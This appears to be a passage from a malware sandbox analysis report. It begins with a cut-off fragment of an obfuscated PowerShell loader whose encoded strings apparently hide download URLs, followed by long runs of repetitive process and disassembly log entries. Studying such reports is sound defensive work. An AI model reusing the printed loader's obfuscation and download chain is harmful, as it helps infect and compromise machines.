t';$Partisk=Mareschal 'OrhSptNot Rp.nsUn: ./tr/.pwVawHywsp.b pAftfrs.a.ungHerEmo u CpS,/.daMebG /K iV nPhfOvaPunF.tPhrTiyGlm Eeudn b.Ocd,peMep Ulo.o .y a>AlhSptS t op.fsac: r/K,/BawCiwskwSu.lupSku En Se testt ,.C aBeeUp/D ad,bKo/M iRanfaf Uason Bt .runy mSue ,n F.Hads.eAnpR lOkoSvy';$Hovedets=Mareschal 'T,>';$Underporch=Mareschal 'N i Se KX';$Kuldioxidets='Strateg';$Debatsidens='\Quaiches.Arg';Dilemmatically (Mareschal 'B $P GLeL.poNeB aA BLSk:Hoa eUdRSsa T deSm=U $,aeP nCaVR :Raa PFrPTadBeA uT uaCe+Sk$ .d HEFaB ADeTTos,ri,kdSiEInNBiS');Dilemmatically (Mareschal 'ge$.eG lAfO .bKnaAwlRy:S c ,hPaAAfp RLN.eFuSS SJo= ,$R pC AD RE tU.iAgSPeK . os ePFol OiPaTDe( o$Reh aoFoVInELsd E,fT hsTr)');Dilemmatically (Mareschal $Underleverancer);$Partisk=$Chapless[0];$bibbed=(Mareschal ' S$ eGFoLTmOUdbAdaUnL O: ,PMyi.icD tPru fRBoIFezInaCoT CIWaORenA,s H=LenKlE .w A-Ovo tbSpjShE.vC,uTNi RySSoyS s ptUde ,m o.n $AnL,aAanNFecDiIC,f eETir nOSmuSus e2 o1 g1');Dilemmatically ($bibbed);Dilemmatically (Mareschal ' T$O,P ,iRuc,itMuuL rAbiS z Ia.etG.iHoo n s .AlH.ee laHedSae ,rNosu [V $PoA PmOvb WiT.g uGriKotRueSht.knV,tKorP aDapT sSpy Ic.dhFii fcJuaInl G]M.=r $UnB LaTilFolKneUnlSusF sM.e PrPieGas');$Instrumenter=Mareschal ' H$SnP istcLet euC.rFuiR z BaInt Di Ao inLss C.,rDS oLywSvnU l .oAba ydTaFU.iAblD,e ( I$PlPMya BrAntRai Gs ,kJ ,Ro$ReFa,o,er ,nPrjFleMidGeeInsSy)';$Fornjedes=$Aerate;Dilemmatically (Mareschal 'fr$BrgLaLPeOFrBunA ,l ,: rvL.I rSpU TS ISS EGlN TS,u=Fr(Idt ,e TsbetBo-pepAnA .TDoh f W$GofPioAfRBln JB E dKoEBrSEn)');while (!$Virussens) {Dilemmatically (Mareschal 'Ov$ ngEtl Co obS,aBal B: uAFinMaa lgMir DaB mFem aaFrtAdi sPreFo= $ iANimSlbAliC g KuH i FtV ePrtBanMudBrsGekR yT.d eFll rssue 2,o3 F6') ;Dilemmatically $Instrumenter;Dilemmatically (MareschaJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BAA507C pushfd ; retf 3_2_00007FFD9BAA50BA
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BAA4C73 push eax; retf 3_2_00007FFD9BAA4CD2
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BAA4CD4 push FD9BCB68h; retf 3_2_00007FFD9BAA4D42
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BB7783D push es; iretd 3_2_00007FFD9BB77847
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BB77457 push es; iretd 3_2_00007FFD9BB77458
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BB783F4 push es; iretd 3_2_00007FFD9BB783F6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BB77BEF push es; iretd 3_2_00007FFD9BB77BF1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BB77FFD push es; iretd 3_2_00007FFD9BB77FFF
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BB77FA7 push es; iretd 3_2_00007FFD9BB77FA9
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BB77BC2 push es; iretd 3_2_00007FFD9BB77BC4
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BB77374 push es; iretd 3_2_00007FFD9BB7737A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BB7437F push ds; iretd 3_2_00007FFD9BB7438F
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BB77787 push es; iretd 3_2_00007FFD9BB77789
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BB78353 push es; iretd 3_2_00007FFD9BB78355
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BB77EEB push es; iretd 3_2_00007FFD9BB77EED
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BB782FD push es; iretd 3_2_00007FFD9BB78309
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BB782AE push es; iretd 3_2_00007FFD9BB782B0
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BB786C3 push es; iretd 3_2_00007FFD9BB786C5
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BB77A67 push es; iretd 3_2_00007FFD9BB77A69
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BB7761D push es; iretd 3_2_00007FFD9BB77628
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BB77234 push es; iretd 3_2_00007FFD9BB77232
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BB77E57 push es; iretd 3_2_00007FFD9BB77E59
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BB77DF4 push es; iretd 3_2_00007FFD9BB77DF6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BB77209 push es; iretd 3_2_00007FFD9BB77232
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BB78618 push es; iretd 3_2_00007FFD9BB7861A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BB779CB push es; iretd 3_2_00007FFD9BB779CD
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BB77D6C push es; iretd 3_2_00007FFD9BB77D88
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BB78593 push es; iretd 3_2_00007FFD9BB78595
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BB78522 push es; iretd 3_2_00007FFD9BB78524
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BB78127 push es; iretd 3_2_00007FFD9BB78129
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BB74526 push es; retf 3_2_00007FFD9BB74527
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
